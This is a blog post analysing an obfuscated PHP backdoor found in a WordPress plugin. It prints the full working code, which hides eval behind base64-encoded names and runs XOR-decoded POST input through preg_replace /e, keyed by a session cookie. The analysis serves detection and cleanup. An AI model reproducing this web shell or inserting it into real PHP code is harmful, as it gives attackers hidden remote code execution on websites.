PHP Coding Exploit Analysis

Tags

, , , , , , ,


Introduction

Last week was busy for exploit attempts! In fact I spent a full 5 days cleaning up PHP files and finding new hacking attempts.

This specific exploit pop’d up just this week, yet again its from a WordPress site and specifically the code entered via a plugin. It employs a different coding style, a mix of techniques (see the article in the reference below for some in-depth analysis), its easy to spot by the human eye but tricky to pick up with detection programs.

Its yet a different way to code an exploit that does not immediately use the keyword “eval” in plain text as most do.

Synopsis

If your not going to read the full article, here is a summary (please spend the few minutes reading everything, you will learn something).

  • Exploit coding techniques are changing weekly.
  • eval(), a common entry point to activating the code is hidden.
  • Reverse XOR used on downloaded data that is base64 encoded.
  • Implements function calls using variables.

First, the code, neatened up to show functions and declarations clearly:

<?php
$O="\x65";  //'e'
$_="\x62\x61\x73$O\x36\x34\x5f\x64$O\x63\x6f\x64$O"; // base64_decode
$_1=$_("YXJyYXlfbWFw"); // array_map
$S=$_1($_,array("Y2hy","b3Jk","c3Vic3Ry",
    "c3RyX3JlcGVhdA","c3RybGVu","am9pbg",
    "YXJyYXlfbWFw","c3RyX3NwbGl0","emxpYl9kZWNvZGU",
    "ZXZhbCgiJGMiKQ","cHJlZ19yZXBsYWNl","c3RyaXBzbGFzaGVz",
    "Ly4qL2U","X1BPU1Q","X0NPT0tJRQ","UEhQU0VTU0lE","ZXhpdA","ZQ","KCk7",));
// $S becomes a list of PHP keywords
function x($c,$k)
{
    global $S;
    return $S[0]($S[1]($c)^$S[1]($k));
// return chr(ord($c) ^ ord($k));   XOR c and K
}
 
function d($d,$k)
{
    global $_,$S;
    $i=2;
    $X=$_($d); // base64_decode($d)
// substr( str_repeat( )
//             2      3      3      4                 4                  4                      4       5
    $y=$S[$i++]($S[$i++]($k,1+($S[$i]($X)/$S[$i]($k))),0,$S[$i++]($X));
//                   5       6          6       7               7              7      8
    return $S[$i++]("",$S[$i++]("x",$S[$i]($X),$S[$i++]($y)));
}
 
function e($c)
{
    global $S;
// preg_replace( /.*/e  , stripslashes( eval(“$c”),””);
    return $S[10]($S[12],$S[11]($S[9]),"");
}
//e(    _POST   ['q']     _COOKIE[PHPSESSID]  
$S[17](d(${$S[13]}["\x71"],${$S[14]}[$S[15]]));
// calls function e( exit () );   exit gets modified ?
$S[17]($S[16].$S[18]);
?>
A dump of the variables gives a clear clue as to what the code executes:
   [O] => e
    [_] => base64_decode
    [_1] => array_map
array_mapArray
(
    [0] => chr
    [1] => ord
    [2] => substr
    [3] => str_repeat
    [4] => strlen
    [5] => join
    [6] => array_map
    [7] => str_split
    [8] => zlib_decode
    [9] => eval("$c")
    [10] => preg_replace
    [11] => stripslashes
    [12] => /.*/e
    [13] => _POST
    [14] => _COOKIE
    [15] => PHPSESSID
    [16] => exit
    [17] => e
    [18] => ();
)

References